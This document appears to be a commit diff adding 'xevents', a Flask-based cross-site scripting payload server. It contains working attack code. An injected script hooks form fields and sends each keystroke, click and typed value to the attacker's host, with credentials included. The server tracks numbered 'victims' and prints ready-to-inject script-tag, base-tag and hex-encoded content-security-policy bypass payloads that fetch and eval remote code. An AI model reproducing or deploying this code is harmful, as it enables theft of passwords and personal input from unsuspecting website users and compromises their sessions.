Add files via upload

lib/parse.py

@@ -0,0 +1,12 @@
+import argparse
+def parser():
+	parser = argparse.ArgumentParser(description="xevents args")
+	parser.add_argument("-H","--host",default="0.0.0.0",help="ip, default 0.0.0.0")
+	parser.add_argument("-p","--port",default=5000,help="port, default 5000")
+	parser.add_argument("-t","--tags",nargs="+",help="tag list separated by spaces")
+	parser.add_argument("-a","--actions",nargs="+",help="event list separated by spaces")
+	parser.add_argument("-c","--config",default="xevents.json",help="json config file (ignored if tags and events specified)")
+	parser.add_argument("-tu","--tunnel",help="url of tunnel")
+	args = parser.parse_args()
+	args.url = args.tunnel or f"http://{args.host}:{args.port}"
+	return args

templates/cspbypass.js

@@ -0,0 +1 @@
+fetch('%url%/p',{credentials: 'include'}).then(response=>response.text()).then(text=>{eval(text)})

templates/xevents.js

@@ -0,0 +1,24 @@
+const url = '{{url}}';
+const tags = ["{{tags|join('","')}}"];
+const actions = ["{{actions|join('","')}}"];
+
+
+function actionLog(inp){
+	actions.forEach(action => {
+	inp.addEventListener(action,function(e){
+		const jsondata={"location":window.location.href,"name":inp.name,"id":inp.id,"class":inp.className,"type":inp.type,"tag":inp.tagName,"action":action,"value":inp.value}
+		fetch(url,{
+			method: 'POST',
+			credentials: 'include',
+			headers: {
+                'Content-Type': 'application/json'
+            },
+            body: JSON.stringify(jsondata)
+		});
+	})
+})};
+
+tags.forEach(tag => {
+let inputs=Array.from(document.getElementsByTagName(tag));
+inputs.forEach(actionLog);
+})

xevents.json

@@ -0,0 +1 @@
+{"tags":["input","textarea","button"],"actions":["click","focusout","focus","copy","input"]}

xevents.py

@@ -0,0 +1,106 @@
+#imports
+from flask import Flask, render_template, request, redirect, make_response, session
+from flask_cors import CORS
+import json
+import logging
+import secrets
+from colorama import Fore, Back, Style
+import lib.parse
+from os import path
+
+app = Flask(__name__)
+
+#secret key for sessions generated at runtime
+app.secret_key = secrets.token_urlsafe(16)
+
+#configure cross origin credential support for victim tracking
+CORS(app, supports_credentials=True)
+
+#remove flasks default logging
+log = logging.getLogger('werkzeug')
+log.disabled = True
+
+#simple array of xeventsIDs to keep track of victim number
+sessions=[]
+
+#handle base tag injection
+@app.before_request
+def prior():
+	if request.path.endswith(".js"):
+		return payload()
+	else:
+		pass
+
+
+#return the payload
+@app.route("/p")
+def payload():
+
+	#assign victim ID
+	if "xeventsID" not in session:
+		session["xeventsID"]=secrets.token_urlsafe(16)
+		sessions.append(session["xeventsID"])
+
+	#read tags and actions from config
+	if args.tags and args.actions:
+		tags=args.tags
+		actions=args.actions
+	else:
+		with open(args.config,"r") as xeventsconfigfile:
+			xeventsconfig=json.loads(xeventsconfigfile.read())
+		tags=xeventsconfig["tags"]
+		actions=xeventsconfig["actions"]
+
+	#prepare and issue response
+	resp=make_response(render_template("xevents.js",tags=tags,actions=actions,url=f"{args.url}/catch"))
+	resp.headers["content-type"]="text/javascript"
+	return resp
+
+#catch json post requests
+@app.route("/catch",methods=["POST"])
+def catch():
+
+	#set up variables from request json
+	rj=request.json
+	action=rj["action"]
+	tag=rj["tag"]
+	location=rj["location"]
+	del rj["action"]
+	del rj["tag"]
+	del rj["location"]
+	#current victim id
+	victim=session["xeventsID"]
+
+	#display results
+	print(f"{tag} tag recieved {Fore.CYAN}{action}{Style.RESET_ALL} event from {Fore.RED}victim {sessions.index(victim)}{Style.RESET_ALL} on {Fore.GREEN}{location}{Style.RESET_ALL}")
+	for key,value in zip(rj.keys(),rj.values()):
+		if value:
+			print(f"\t{key}:{value}")
+	print("\n")
+	return ""
+
+if __name__ == "__main__":
+	args=lib.parse.parser()
+	print(f"{Fore.RED}inject as script tag: {Style.RESET_ALL}")
+	print(f"{args.url}/p\n")
+
+	print(f"{Fore.RED}inject as base tag: {Style.RESET_ALL}")
+	print(args.url)
+	print("\n")
+
+	with open(path.join("templates","cspbypass.js"),"r") as cspbyp:
+		payload=cspbyp.read().replace("%url%",args.url)
+		encoded="".join(["\\x%x" %ord(char) for char in payload])
+		encoded=f"Function(\"{encoded}\")()"
+		payload=f"Function(\"{payload}\")()"
+
+
+	print(f"{Fore.RED}csp src self bypass: {Style.RESET_ALL}")
+	print(payload)
+	print("\n")
+
+	print(f"{Fore.RED}csp src self bypass + hex encoding: {Style.RESET_ALL}")
+	print(encoded)
+	print("\n")
+	
+	app.run(args.host,args.port)